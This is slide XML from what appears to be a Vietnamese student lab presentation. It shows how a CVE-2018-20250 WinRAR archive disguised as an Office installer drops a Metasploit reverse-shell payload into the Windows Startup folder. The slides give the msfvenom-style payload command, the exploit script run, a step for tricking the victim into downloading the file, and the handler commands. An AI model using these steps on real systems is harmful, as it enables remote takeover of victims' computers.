            <a:off x="3897201" y="1456347"/>
            <a:ext cx="4533571" cy="223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79"/>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9"/>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Máy thật đã cài đặt Python phiên bản mới nhất.</a:t>
            </a:r>
            <a:endParaRPr sz="2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8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Các bước tiến hành</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p80"/>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Bước 1: Cài đặt Kali Linux và Windows 10 trên phần mềm VM VirtualBox và máy Windows 10 là máy victim.</a:t>
            </a:r>
            <a:endParaRPr sz="2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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="27402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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Bước 2: Check IP máy attacker</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>+ Mở Terminal trong Kali Linux</a:t>
            </a:r>
            <a:endParaRPr sz="25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lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ip a</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623550" y="1700238"/>
            <a:ext cx="4807224" cy="238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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="77178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Bước 3: Tạo file shell.exe</a:t>
            </a:r>
            <a:endParaRPr sz="28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Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe &gt; shell.exe</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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pic>
        <p:nvPicPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121562" y="1181791"/>
            <a:ext cx="6900877" cy="341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Bước 4: Tạo file Office365Setup.rar</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Dùng máy thật mở Command Prompt (cmd)</a:t>
            </a:r>
            <a:endParaRPr sz="28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Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>git clone https://github.com/giatrung2012/CVE-2018-20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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pic>
        <p:nvPicPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405696" y="1181800"/>
            <a:ext cx="6332613" cy="34176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86"/>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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kéo file shell.exe từ máy Kali Linux sang máy thật</a:t>
            </a:r>
            <a:endParaRPr sz="25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2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Di chuyển vào folder CVE-2018-20250 rồi compile file exp.py</a:t>
            </a:r>
            <a:endParaRPr sz="25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2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cd CVE-2018-20250</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>py exp.py</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="25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6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Bố cục</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="969" name="Google Shape;969;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1949500" y="2063975"/>
            <a:ext cx="2473800" cy="615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0" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tổng quan</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Google Shape;970;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225"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
        <p:nvSpPr>
          <p:cNvPr id="971" name="Google Shape;971;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="344585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972" name="Google Shape;972;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4720400"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
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5841050" y="1937975"/>
            <a:ext cx="26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Cơ sở lý thuyết</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Google Shape;974;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1949500" y="3280100"/>
            <a:ext cx="265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Kết quả thực nghiệm</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id="1132" name="Google Shape;1132;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405696" y="1181800"/>
            <a:ext cx="6332613" cy="34176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88"/>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Bước 5: Lừa victim tải file Office365Setup.rar</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Kéo file Office365Setup.rar từ máy thật sang Desktop của Kali Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2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89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="31416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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cd Desktop/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="25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b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>python3 -m http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (do trình độ còn giới hạn nên nhóm em dùng cách này)</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970225" y="1840125"/>
            <a:ext cx="4460549" cy="22090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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="28617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2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mở Chrome trên máy Windows 10, truy cập 10.0.0.199:8000 &amp; download file Office365Setup.rar</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809250" y="1753564"/>
            <a:ext cx="4621525" cy="2274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91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="41142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Bước 6: Dùng Metasploit để tấn công</a:t>
            </a:r>
            <a:endParaRPr sz="28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Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047150" y="1181800"/>
            <a:ext cx="3383624" cy="1675700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047150" y="2923696"/>
            <a:ext cx="3383624" cy="167570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92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="77178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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>set lport 1234</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>set lhost 10.0.0.199</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>exploit -j</a:t>
            </a:r>
            <a:endParaRPr b="1"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pic>
        <p:nvPicPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121534" y="1181800"/>
            <a:ext cx="6900924" cy="341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9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Sau khi user máy Windows 10 giải nén file Office365Setup.rar thì trong folder C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ xuất hiện file hi.exe (mã độc)</a:t>
            </a:r>
            <a:endParaRPr sz="2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pic>
        <p:nvPicPr>
          <p:cNvPr id="1176" name="Google Shape;1176;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099272" y="1181825"/>
            <a:ext cx="6945445" cy="341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96"/>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Trong Task Manager xuất hiện ApacheBench command line utility (hi.exe). Khi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ser restart PC thì mã độc sẽ tự động kích hoạt.</a:t>
            </a:r>
            <a:endParaRPr sz="2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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="457748">
            <a:off x="1251188" y="2000563"/>
            <a:ext cx="3391824" cy="1263974"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TỔNG QUAN</a:t>
            </a:r>
            <a:endParaRPr sz="5600">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="Google Shape;980;p61"/>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97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099147" y="1181797"/>
            <a:ext cx="6945445" cy="3417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98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="3153600" cy="3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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sessions </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sessions 1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (Kiểm tra thông tin máy victim)</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
